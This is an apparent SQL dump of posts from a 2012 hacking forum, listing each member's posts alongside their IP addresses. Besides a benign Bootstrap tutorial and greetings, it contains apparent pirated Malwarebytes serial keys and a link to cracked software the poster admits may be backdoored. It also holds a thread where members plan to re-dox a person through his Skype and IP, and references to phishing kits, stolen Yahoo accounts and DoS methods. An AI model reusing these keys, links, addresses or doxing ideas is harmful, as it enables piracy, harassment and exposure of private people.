`ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7234', '1224', '0', '68', 'Twitter Bootstrap Tutorial', '0', '9', 'p420', '1352350103', 'You may be asking what is twitters bootstrap and why would I want to use it? Bootstrap is a sleek, intuitive, and powerful front-end framework for faster and easier web development. Pro\'s and Cons Pros: - Easy to use - Pre coded css - Pre coded jquery - Very well documented - Tablet/ mobile support - For all browsers! Cons: - so far none. well, you might be asking what do I need to use this? you\'re going to need a web server, ftp client, a text editor, and last but not lest bootstrap [lock] Download the bootstrap here: http://twitter.github.com/bootstrap/index.html Document page about the bootstrap: http://twitter.github.com/bootstrap/scaffolding.html For these examples I used Notepad++ First extract, the file and then Upload the bootstrap to your webserver using a ftp client not that hard... So your root should look like {root dir}/bootstrap and you should see a css folder and a js folder, in the bootstrap directory soo, now lets move on and start writing somecode so go to your root directory and write this html template, [img]http://img138.imageshack.us/img138/9754/e7056d74d2b7478f9ff2123.png[/img] here is the code for you lame asses, [code] <!-- Immortal @ Anarchy Forums --> <!DOCTYPE html> <html> <head> <title>Example Code</title> <!-- Loading the bootstrap css file --> <link href=\"/bootstrap/css/bootstrap.min.css\" rel=\"stylesheet\"> </head> <body> <h1>Hello, world!</h1> <!-- Loading jquery --> <script src=\"http://code.jquery.com/jquery-latest.js\"></script> <!-- Loading the bootstrap javascript file --> <script src=\"/bootstrap/js/bootstrap.min.js\"></script> </body> </html> [/code] Soo now we are going to use, navbar to give us a sexy link tablet. [img]http://img208.imageshack.us/img208/755/9d520dfa099f4047bb42f97.png[/img] [code] <!-- Immortal @ Anarchy Forums --> <!DOCTYPE html> <html> <head> <title>Example Code</title> <!-- Loading the bootstrap css file --> <link href=\"/bootstrap/css/bootstrap.min.css\" rel=\"stylesheet\"> </head> <body> <div class=\"navbar\"> <div class=\"navbar-inner\"> <a class=\"brand\" href=\"#\">Welcome Home</a> <ul class=\"nav\"> <li class=\"active\"><a href=\"#\">Page 1</a></li> <li><a href=\"#\">Page 2</a></li> <li><a href=\"#\">Page 3</a></li> </ul> </div> </div> <!-- Loading jquery --> <script src=\"http://code.jquery.com/jquery-latest.js\"></script> <!-- Loading the bootstrap javascript file --> <script src=\"/bootstrap/js/bootstrap.min.js\"></script> </body> </html> [/code] here is, what the site looks like. [img]http://img21.imageshack.us/img21/6694/86db50116b00440ab2f99c9.png[/img] [/lock]', '72.231.24.165', '1223104677', '0', '0', '9', '1352350136', '1', '6fedb6d1cbba3fae064d7178d8ecd92c', '0', '1352350136'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7235', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '9', 'p420', '1352350193', 'I reached 100 posts :D Most were tutorials.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '2dbaf4b2dc837cc62b5888b55a5b39b2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7236', '765', '6142', '46', 'RE: Vulcan Private Pisher Generator', '0', '7', 'Romdu62', '1352350337', '[quote=\'Rave™\' pid=\'6142\' dateline=\'1350937597\'] Thanks [code] [/code] [code] [/code] [code] [/code] [/quote] Oh your welcome you LQ mother fucking leecher.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'bfbdd9194a33fc545c7e6f0d79f78786', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7237', '765', '3901', '46', 'RE: Vulcan Private Pisher Generator', '0', '257', 'XxTREYZxX', '1352353831', 'Thanks heaps man. i will use this.', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '4f58a3b86a8c742c1f1f176075862985', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7238', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '257', 'XxTREYZxX', '1352353933', 'Good on you p420 on your 100th post.', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', 'e53e3ddd23d9738e91f148db16af9e8a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7239', '1078', '6254', '7', 'RE: Kasual/Rave\'s DOX (Thanks to NSA)', '0', '150', 'MinecraftGeek', '1352361170', 'http://notsoanonymo.us/index.php?/topic/10-kasuals-dox/page__gopid__32#entry32', '86.147.121.117', '1452505461', '0', '0', '0', '0', '1', 'c8343127601af5671925cd1546fae1b5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7240', '1222', '7232', '13', 'RE: 400,000 Hacked Yahoo Accounts Dumps', '0', '67', 'HoverCatz', '1352363425', 'lock it inside [ lock]HERE[ /lock] without space', '193.161.89.202', '-1046390326', '1', '0', '0', '0', '1', 'ae3e535cafea15719829197ca8253b80', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7241', '1213', '7173', '34', 'RE: Black Sleek Thread Design .PSD', '0', '67', 'HoverCatz', '1352365114', 'Thanks for this :)', '193.161.89.203', '-1046390325', '1', '0', '0', '0', '1', 'fd5d7cff029c3e5aa6282d3ecea92cc0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7242', '1203', '7073', '21', 'RE: Jok3r Manual DoSing sites method', '0', '228', 'VirtualLegend', '1352371915', 'Hope i will understand it', '81.18.248.110', '1360197742', '0', '0', '0', '0', '1', '4929d3f4821e4f4f965c153bdca508a6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7243', '1204', '7084', '3', 'RE: We are L33T', '0', '228', 'VirtualLegend', '1352372370', 'The next milestone is 7777 Posts :P', '81.18.248.110', '1360197742', '0', '0', '0', '0', '1', '620e42e1e875a208a3551e14b9ae77b8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7244', '1208', '7166', '9', 'RE: Steady $8 a Day [EXPLOIT]', '0', '330', 'Dage', '1352373378', 'I will try it and see if it works.', '78.3.250.129', '1308883585', '0', '0', '0', '0', '1', '79dc00bb6bb790142f8d3981e8779889', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7246', '1222', '7240', '13', 'RE: 400,000 Hacked Yahoo Accounts Dumps', '0', '9', 'p420', '1352391976', '[quote=\'HoverCatz\' pid=\'7240\' dateline=\'1352363425\'] lock it inside [ lock]HERE[ /lock] without space [/quote] Done. Thanks for reminding me.', '165.155.208.77', '-1516515251', '0', '0', '0', '0', '1', 'e2a4662e80fbcb17ce39788ffde31628', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7247', '1078', '7239', '7', 'RE: Kasual/Rave\'s DOX (Thanks to NSA)', '0', '1', 't3h jok3r', '1352393341', '[quote=\'MinecraftGeek\' pid=\'7239\' dateline=\'1352361170\'] http://notsoanonymo.us/index.php?/topic/10-kasuals-dox/page__gopid__32#entry32 [/quote] Since we have his Skype it would be easier to find his current IP.', '165.155.208.77', '-1516515251', '1', '0', '0', '0', '1', 'fc0baa625fbd87d78aeacedec693a146', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7248', '1215', '7175', '3', 'RE: Post/PM Allowed for ACCOUNTS Only.', '0', '1', 't3h jok3r', '1352393452', 'Thanks to NXK for this idea. This idea is very useful and would definitely stop the leechers.', '165.155.208.77', '-1516515251', '1', '0', '0', '0', '1', '9e4b049d4bfaeb9c8a5b18e11449f365', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7249', '1225', '0', '25', '[Serials] Malwarebytes Full keys Dump', '0', '5', 'Timmy', '1352393640', 'Hope you get a working one, they should be working. Enjoy. Download Malwarebytes: http://www.malwarebytes.org/ (Free Download) Use any of the following codes: (I used the first one and it worked) [code] Serials: 6IE48 2V34-29J4-CGWY-FTEF 5TI39 1CX6-BLVV-MPN4-UYGC 2IX56 RF8L-295V-TP7G-J3QE [/code]', '165.155.208.77', '-1516515251', '1', '0', '0', '0', '1', '1592f828fe4bc3481470982e7ff2aa7b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7250', '1226', '0', '30', 'Release Cracked - Youtube Booster Pro edition!', '0', '5', 'Timmy', '1352393844', 'I checked it, it is still working :D Not sure if it\'s backdoored but run in sandbox just incase :) Screenshot http://easycaptu.re/r0fZp [lock] https://dl.dropbox.com/u/62710280/YouBooster%20PRO%20EDITION.rar [/lock]', '165.155.208.77', '-1516515251', '1', '0', '1', '1352427291', '1', 'b523107e1ccda5ac89cd80ea61191e0c', '0', '1352427291'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7251', '1225', '7249', '25', 'RE: [Serials] Malwarebytes Full keys Dump', '0', '82', 'iTzIpod', '1352406855', 'Thanks for the share! Although I won\'t be needing this.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '25ff234874fe51d5707b81c3184fedb9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7252', '1078', '6254', '7', 'RE: Kasual/Rave\'s DOX (Thanks to NSA)', '0', '2', 'Apathy', '1352408158', 'It would be sick if you could get him re-doxed.', '173.206.129.3', '-1378975485', '0', '0', '0', '0', '1', '48045018ea602d7355d37ad8dd777f66', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7253', '1207', '7133', '35', 'RE: Rate these logos', '0', '2', 'Apathy', '1352408225', 'Is this by any chance for skill?', '173.206.129.3', '-1378975485', '0', '0', '0', '0', '1', 'c96d452e8adac73a31e4654cb517583f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7254', '1227', '0', '4', 'Whaddup! <3', '0', '333', 'illest', '1352413588', '[b][align=center]Hello! I am illest! You may know me from other forums! I will post a list of usernames I go by down at the bottom. I a, just look for new forums and I ran into this one! Hopefully I will enjoy my time here. If you want to chat or anything like that, feel free to send me a PM and I will provide you my Skype or Aim. I talk about anything, if you have problems or something I will be more than happy to talk to you about them. Thanks for reading this, I appreciate it a lot! See you around! Peace! <3 Other sites you may know me on. If you know me, send me a PM! [spoiler]SE.net - Jdm TTG - Jdm LF - illest VHF - illest EliteVIP - Love HF - STANCEWORKS [/spoiler] [/align][/b]', '65.102.190.80', '1097252432', '0', '0', '0', '0', '1', '8c15b9c9effaf5a779865a7ffd4ada1c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7255', '1207', '7133', '35', 'RE: Rate these logos', '0', '333', 'illest', '1352413672', 'I love the first one! That is my favorite out of all of them! I rate it a 8.6/10!', '65.102.190.80', '1097252432', '0', '0', '0', '0', '1', '91ca718c39f582c942f73539eb9a9d79', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7256', '1228', '0', '35', 'New banner!', '0', '333', 'illest', '1352414056', 'Just made this for you guys! Hope you like it(: Old Banner: [spoiler][img]http://l33thacking.net/images/CoderGreen/logo.png[/img][/spoiler] New Banner: [spoiler][img]http://i.imgur.com/qkVfJ.png[/img][/spoiler] Preview on the site: [spoiler][url=http://icap.me/i/cC1CZRJRST.png]Preview of Banner in use![/url][/spoiler]', '65.102.190.80', '1097252432', '0', '0', '333', '1352414108', '1', '7f570edb8899d09edb20b9930fc2d466', '0', '1352414108'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7257', '1228', '7256', '35', 'RE: New banner!', '0', '82', 'iTzIpod', '1352418658', 'Looks very nice! :) Nice design and thanks for the contribution to our forum.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3d6728772724f4790dba98dbf541c6a0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7258', '1227', '7254', '4', 'RE: Whaddup! <3', '0', '82', 'iTzIpod', '1352418786', 'You should not post your HF name as Omniscient might ban you. :p I don\'t know but it\'s a maybe. Welcome to the forum dude! :D Enjoy your stay. Hope you be active and HQ. Add me on Skype! Skype ID: iTzIpod', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f7935bfb1254a3b5b336a2a2a16e8e7f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7259', '1207', '7133', '35', 'RE: Rate these logos', '0', '82', 'iTzIpod', '1352418842', '@Apathy, what are you talking about? No they were in need of a new banner so I volunteered and offered my time to make a banner for them. Thanks illest for your feedback! :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2eb52c7aabdb9f53f2b9174effe0bdad', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7260', '1145', '6709', '42', 'RE: Kim Kardashian Sex Tape (40 Mins - Warning 18+)', '0', '262', 'RAND0M1ZER', '1352422939', 'Links are down! Please fix them, lol [hr] Aw links are down, can you fix them?', '108.162.138.186', '1822591674', '0', '0', '262', '1352422976', '1', '2fb8cd97fad8ea6752349bd3bbbc08f6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7261', '1227', '7254', '4', 'RE: Whaddup! <3', '0', '61', 'NXK', '1352426489', 'Welcome, I hope you find what you\'re looking for here. Good luck and stay HQ :)', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '55b5ea01c3404d522974a747065a4dab', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7262', '1145', '6709', '42', 'RE: Kim Kardashian Sex Tape (40 Mins - Warning 18+)', '0', '1', 't3h jok3r', '1352427111', 'Leechers gonna leech. I wish the OP used the lock mycode anyway closed.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '112011775ce92f663e22944eedac6e49', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7263', '1227', '7254', '4', 'RE: Whaddup! <3', '0', '1', 't3h jok3r', '1352427255', 'Welcome to L33T Hacking illest. How did you find us?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0480103b1f6fd2d6bcf11cf118e860cc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7264', '1078', '7252', '7', 'RE: Kasual/Rave\'s DOX (Thanks to NSA)', '0', '1', 't3h jok3r', '1352427664', '[quote=\'Apathy\' pid=\'7252\' dateline=\'1352408158\'] It would be sick if you could get him re-doxed. [/quote] Was that meant for me or expose?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b76f3e3748bcad150cee4ea105dbfa33', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7265', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '1', 't3h jok3r', '1352427997', 'I finally reached 1,000 posts and L33T Hacking now has 7,100 posts. Our monetizing section also reached 200 posts.', '72.231.24.165', '1223104677', '1', '0', '1', '1352428042', '1', '3e3bdbd7215778c882d5310be6eee9dc', '0', '1352428042'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7266', '1227', '7263', '4', 'RE: Whaddup! <3', '0', '333', 'illest', '1352430923', '[quote=\'t3h jok3r\' pid=\'7263\' dateline=\'1352427255\'] Welcome to L33T Hacking illest. How did you find us? [/quote] I was actually voting on a website for a different site (don\'t remember what website) but then I saw this forum, and I was like hmm that looks interesting! Thanks for all the welcomes guys!', '65.102.190.80', '1097252432', '0', '0', '0', '0', '1', 'b765d480be9006861ca71cf4a2ab253b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7267', '1228', '7257', '35', 'RE: New banner!', '0', '333', 'illest', '1352431003', '[quote=\'iTzIpod\' pid=\'7257\' dateline=\'1352418658\'] Looks very nice! :) Nice design and thanks for the contribution to our forum. [/quote] You\'re very welcome kind sir! Hopefully it will be used! That would make me pretty happy(:', '65.102.190.80', '1097252432', '0', '0', '0', '0', '1', 'dff11f1df720a9d2a8dcd02ac511d0f4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7310', '1234', '7299', '46', 'RE: Did someone ever hack you through phishing?', '0', '1', 't3h jok3r', '1352519900', 'Someone once hacked my FB through phishing when I was like 12 years old.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0747ab218cc180c552340143cff4239c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7311', '1234', '7299', '46', 'RE: Did someone ever hack you through phishing?', '0', '5', 'Timmy', '1352520916', 'Someone hacked my email through phishing and deleted all my emails.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '04176177f35a13c201b61e4f0cc64a63', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7312', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '5', 'Timmy', '1352520969', 'Lol congratz jok3r on 1000 posts.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'db55788300f4bb6a0ed621ff023741dd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7269', '1227', '7266', '4', 'RE: Whaddup! <3', '0', '1', 't3h jok3r', '1352431093', '[quote=\'illest\' pid=\'7266\' dateline=\'1352430923\'] [quote=\'t3h jok3r\' pid=\'7263\' dateline=\'1352427255\'] Welcome to L33T Hacking illest. How did you find us? [/quote] I was actually voting on a website for a different site (don\'t remember what website) but then I saw this forum, and I was like hmm that looks interesting! Thanks for all the welcomes guys! [/quote] Oh that\'s cool. I know what site you found on us now, thanks for joining and hope you enjoy your stay.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '382935b24b0291247a91a41bdb4ac4c3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7270', '1229', '0', '49', 'Just a quick suggestion.', '0', '333', 'illest', '1352431355', '[align=center][b]I personally think the shadow should be removed in some places, it would look much cleaner in my opinion. I will post below where the shadow looks bad. [img]http://icap.me/i/2KN5xhrN18.png[/img][/b][/align]', '65.102.190.80', '1097252432', '0', '0', '0', '0', '1', 'cd9ed84808e362be9d00644cf562fbd8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7271', '1078', '7264', '7', 'RE: Kasual/Rave\'s DOX (Thanks to NSA)', '0', '2', 'Apathy', '1352433223', '[quote=\'t3h jok3r\' pid=\'7264\' dateline=\'1352427664\'] [quote=\'Apathy\' pid=\'7252\' dateline=\'1352408158\'] It would be sick if you could get him re-doxed. [/quote] Was that meant for me or expose? [/quote] Exposed. But you could do it too. :P', '173.206.129.140', '-1378975348', '0', '0', '0', '0', '1', '51ac92f38e6042b13fd46df7ec1abd9c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7272', '1226', '7250', '30', 'RE: Release Cracked - Youtube Booster Pro edition!', '0', '54', 'Sin Cara', '1352436330', 'Thanks for the share.Going to check it right now.', '119.154.7.175', '2006583215', '1', '0', '0', '0', '1', 'd8d6c7a88cb5e8617fe59850f4a7db73', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7273', '1227', '7254', '4', 'RE: Whaddup! <3', '0', '228', 'VirtualLegend', '1352449592', 'Sup illest Welcome to LH, Have a nice stay here', '81.18.248.110', '1360197742', '0', '0', '0', '0', '1', '1a07a471b7a0ceadf0d572014870796e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7274', '1228', '7256', '35', 'RE: New banner!', '0', '228', 'VirtualLegend', '1352449671', 'It looks very Good Good Job', '81.18.248.110', '1360197742', '0', '0', '0', '0', '1', 'c299b8e87575ba30c3b4751ce2bcf1a2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7275', '1228', '7256', '35', 'RE: New banner!', '0', '257', 'XxTREYZxX', '1352450451', 'Its a great design. Great work.', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '07e7362e829a78793217c390c7dcd6b5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7276', '1227', '7254', '4', 'RE: Whaddup! <3', '0', '257', 'XxTREYZxX', '1352450845', 'Have a great stay please be active.', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', 'ebf25bc048580718da459c5d07302dd1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7277', '1226', '7250', '30', 'RE: Release Cracked - Youtube Booster Pro edition!', '0', '62', 'R?????zo?', '1352451205', 'Thanks for this, I will have a look :)', '95.69.35.19', '1598366483', '1', '0', 